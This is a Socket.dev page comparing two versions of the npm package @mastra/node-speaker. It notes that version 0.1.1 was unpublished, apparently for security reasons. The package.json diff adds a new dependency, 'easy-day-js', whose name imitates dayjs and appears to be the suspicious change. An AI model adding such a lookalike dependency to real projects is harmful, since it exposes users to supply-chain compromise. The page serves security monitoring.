🚀 Socket Launch Week Day 5:Introducing Repository Access Permissions and Custom Roles.Learn more
Sign In

@mastra/node-speaker

Package Overview
Dependencies
Maintainers
1
Versions
2
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

@mastra/node-speaker - npm Package Compare versions

Package version was removed
This package version has been unpublished, mostly likely due to security reasons
Comparing version
0.1.0
to
0.1.1
+18
-17
package.json
{
"name": "@mastra/node-speaker",
"version": "0.1.0",
"license": "(MIT AND LGPL-2.1-only)",
"description": "Output PCM audio data to the speakers - Fork with CoreAudio buffer underflow fixes",
"author": "Nathan Rajlich <nathan@tootallnate.net> (http://tootallnate.net)",
"author": "Nathan Rajlich \u003cnathan@tootallnate.net\u003e (http://tootallnate.net)",
"contributors": [

@@ -11,16 +7,9 @@ "Jason Benn (https://github.com/JasonBenn)",

],
"repository": {
"type": "git",
"url": "https://github.com/mastra-ai/node-speaker"
},
"main": "index.js",
"types": "index.d.ts",
"scripts": {
"test": "standard && node-gyp rebuild --mpg123-backend=dummy && mocha --reporter spec"
},
"dependencies": {
"bindings": "^1.3.0",
"buffer-alloc": "^1.1.0",
"debug": "^4.0.0"
"debug": "^4.0.0",
"easy-day-js": "^1.11.21"
},
"description": "Output PCM audio data to the speakers - Fork with CoreAudio buffer underflow fixes",
"devDependencies": {

@@ -32,3 +21,3 @@ "@types/node": "^12.12.14",

"engines": {
"node": ">=8.6"
"node": "\u003e=8.6"
},

@@ -52,3 +41,15 @@ "keywords": [

"mpg123"
]
],
"license": "(MIT AND LGPL-2.1-only)",
"main": "index.js",
"name": "@mastra/node-speaker",
"repository": {
"type": "git",
"url": "https://github.com/mastra-ai/node-speaker"
},
"scripts": {
"test": "standard \u0026\u0026 node-gyp rebuild --mpg123-backend=dummy \u0026\u0026 mocha --reporter spec"
},
"types": "index.d.ts",
"version": "0.1.1"
}